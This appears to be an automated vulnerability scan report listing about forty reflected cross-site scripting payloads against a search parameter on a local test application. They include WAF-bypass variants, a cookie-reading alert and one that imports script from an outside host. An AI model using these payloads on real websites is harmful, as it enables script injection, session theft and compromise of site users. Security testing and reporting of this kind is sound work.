Vulnerability Assessment Report

Detailed Findings

Screenshot	Vulnerable URL	Payload
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg%2fonload%3dconfirm(1)%3e	`"><svg/onload=confirm(1)>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cimg+src%3dx+onerror%3d(prompt(document.domain))%3b%3e	`"><img src=x onerror=(prompt(document.domain));>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg%3e%3cimg+src%3dx+onerror%3dprompt(document.domain)%3b%3e%3c%2fsvg%3e	`"><svg><img src=x onerror=prompt(document.domain);></svg>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cinput+type%3dtext+onfocus%3dalert(1)+autofocus%3e	`"><input type=text onfocus=alert(1) autofocus>`
	http://127.0.0.1/novo/index.php?search=%3e%3c%2fSCRIPT%3e%22%3e%27%3e%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e	`></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cimg+src%3dx+ONERROR%3dprompt(document.domain)%3b%3e	`"><img src=x ONERROR=prompt(document.domain);>`
	http://127.0.0.1/novo/index.php?search=%3e%27%3e%22%3e%3cscript%3ealert()%3b%3c%2fscript%3e	`>'>"><script>alert();</script>`
	http://127.0.0.1/novo/index.php?search=%3c%3ftag+x%3d%22--%3e%22+test%3d%22%3cimg+src%3dx+onerror%3dalert(1)%2f%2f%22%3e	`<?tag x="-->" test="<img src=x onerror=alert(1)//">`
	http://127.0.0.1/novo/index.php?search=jane(%27%22%3e%3cscript%3ealert(2)%3c%2fscript%3e)%40gmail.com	`jane('"><script>alert(2)</script>)@gmail.com`
	http://127.0.0.1/novo/index.php?search=%250d%250a%2520%22%3e%3cimg+src%3dx+onerror%3dprompt(document.domain)%3b%3e	`%0d%0a%20"><img src=x onerror=prompt(document.domain);>`
	http://127.0.0.1/novo/index.php?search=%27%22()%26%25%3czzz%3e%3cScRiPt+%3ealert(document.cookie)%3c%2fScRiPt%3e	`'"()&%<zzz><ScRiPt >alert(document.cookie)</ScRiPt>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3ciframe%2fsrcdoc%3d%27%3cscript%3ealert(%22XSS_WAF_BYPASS_%3a-)%22)%3c%2fscript%3e%27%3e	`"><iframe/srcdoc='<script>alert("XSS_WAF_BYPASS_:-)")</script>'>`
	http://127.0.0.1/novo/index.php?search=%27%22%3e%3cimg+src%3dx+onerror%3dalert(%22xss!%22)%3e.pdf	`'"><img src=x onerror=alert("xss!")>.pdf`
	http://127.0.0.1/novo/index.php?search=javascript%3a%60%2f%2f%22%2f%2f%5c%22%2f%2f%3c%2ftitle%3e%3c%2ftextarea%3e%3c%2fstyle%3e%3c%2fnoscript%3e%3c%2fnoembed%3e%3c%2fscript%3e%3c%2ftemplate%3e%26lt%3bsvg%2fonload%3d%27%2f--%3e%3chtml+%2f+onmouseover%3dalert()%2f%2f%27%3e%60	javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/--><html / onmouseover=alert()//'>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cscript%3esetTimeout(function()%7balert(1)%7d%2c10)%3c%2fscript%3e	`"><script>setTimeout(function(){alert(1)},10)</script>`
	http://127.0.0.1/novo/index.php?search=1%26%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%3d1	`1&"><script>alert(1)</script>=1`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e	`"><img src=x onerror=prompt(1);>`
	http://127.0.0.1/novo/index.php?search=%27%22--%3e%3c%2fSCRIPT%3e%22%3e%27%3e%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%27	`'"--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'`
	http://127.0.0.1/novo/index.php?search=%27%22%2f%3e%3cimg+src%3d+x+onerror%3dprompt(%2fxss%2f)%3e	`'"/><img src= x onerror=prompt(/xss/)>`
	http://127.0.0.1/novo/index.php?search=%27%2f%5c%27%2f%22%2f%5c%22%2f%3c%2fScript%3e%3cInput%2fAutoFocus%2fOnFocus%3dalert(1)%2f**%2f(import(%2fhttps%3a%5c%5cX55.is%3f1%3d18369%2f.source))%2f%2f%3e	`'/\'/"/\"/</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cscript%3esetTimeout(%27alert(1)%27%2c0)%3c%2fscript%3e	`"><script>setTimeout('alert(1)',0)</script>`
	http://127.0.0.1/novo/index.php?search=%22%2f%3e%22%2f%3e%3cimg+src%3dxss+onerror%3dalert(2)%3e	`"/>"/><img src=xss onerror=alert(2)>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3e%3cmarquee%3e%3cimg+src%3dx+onerror%3dconfirm(1)%3e%3c%2fmarquee%3e%22+%3e%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)+%3e%3cscript%3eprompt(1)%3c%2fscript%3e%40gmail.com%3cisindex+formaction%3djavascript%3aalert(%2fXSS%2f)+type%3dsubmit%3e%27--%3e%22+%3e%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3e%3cimg%2fid%3d%22confirm%26lpar%3b+1)%22%2falt%3d%22%2f%22src%3d%22%2f%22onerror%3deval(id%26%2523x29%3b%3e%27%22%3e%3cimg+src%3d%22http%3a+%2f%2fi.imgur.com%2fP8mL8.jpg%22%3e	`">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></\|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">`
	http://127.0.0.1/novo/index.php?search=%22onclick%3dprompt(8)%3e%3csvg%2fonload%3dprompt(8)%3e%22%40x.y	`"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y`
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg+onload%3dalert(1)%3e	`"><svg onload=alert(1)>`
	http://127.0.0.1/novo/index.php?search=%3c%3fxml+version%3d%221.0%22+%3f%3e%3csvg%3e%3cscript%3ealert(1)%3c%2fscript%3e%3c%2fsvg%3e	`<?xml version="1.0" ?><svg><script>alert(1)</script></svg>`
	http://127.0.0.1/novo/index.php?search=%e5%98%bc%22%3e%3csvg+onload%3dprompt(document.domain)%3b%3e	`嘼"><svg onload=prompt(document.domain);>`
	http://127.0.0.1/novo/index.php?search=1%27%22()%3b%3ctest%3e%3ciframe+onload%3d%22window.alert(%27XSS_WAF_BYPASS%27)%22%3e%3c%2fiframe%3e	`1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>`
	http://127.0.0.1/novo/index.php?search=%3c%25+foo%3e%3cx+foo%3d%22%25%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3e	`<% foo><x foo="%><script>javascript:alert(1)</script>">`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cIMG+SRC%3dx+ONERROR%3dprompt(document.domain)%3b%3e	`"><IMG SRC=x ONERROR=prompt(document.domain);>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg%2fonload%3d%26%2397%3b%26%23108%3b%26%23101%3b%26%23114%3b%26%23116%3b(1)%3e	`"><svg/onload=alert(1)>`
	http://127.0.0.1/novo/index.php?search=%3cnoframes%3e%3cstyle+id%3d%22%3c%2fnoframes%3e%3cimg+src%3d1+onerror%3dalert(2)%3e%22%3e	`<noframes><style id="</noframes><img src=1 onerror=alert(2)>">`
	http://127.0.0.1/novo/index.php?search=%22%2f%3e%3cscript%3ealert(1337)%3b%3c%2fscript%3e	`"/><script>alert(1337);</script>`
	http://127.0.0.1/novo/index.php?search=1%27%22()%3b%3ctest%3e%3cScRiPt%3ealert(%22XSS_WAF_BYPASS%22)%3c%2fScRiPt%3e	`1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>`
	http://127.0.0.1/novo/index.php?search=%27%22%3e%3e%3cmarquee%3e%3cimg+src%3dx+onerror%3dconfirm(1)%3e%3c%2fmarquee%3e%22%3e%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)%3e	`'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></\|\><plaintext/onmouseover=prompt(1)>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg+onload%3d%22confirm(7)%22%3e	`"><svg onload="confirm(7)">`
	http://127.0.0.1/novo/index.php?search=%22%3e%3cimg+src%3dx+onerror%3dalert(%27XSS%27)%3b%3e	`"><img src=x onerror=alert('XSS');>`
	http://127.0.0.1/novo/index.php?search=%22%3e%3csvg%2fonload%3dalert(1)%3b%3e	`"><svg/onload=alert(1);>`
	http://127.0.0.1/novo/index.php?search=%231%26%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%3d1	`#1&"><script>alert(1)</script>=1`

Vulnerability Assessment Report

Executive Summary

Vulnerabilities per URL

Severity Distribution

Detailed Findings

Executive Summary

Social Media

Vulnerabilities per URL

Severity Distribution

Detailed Findings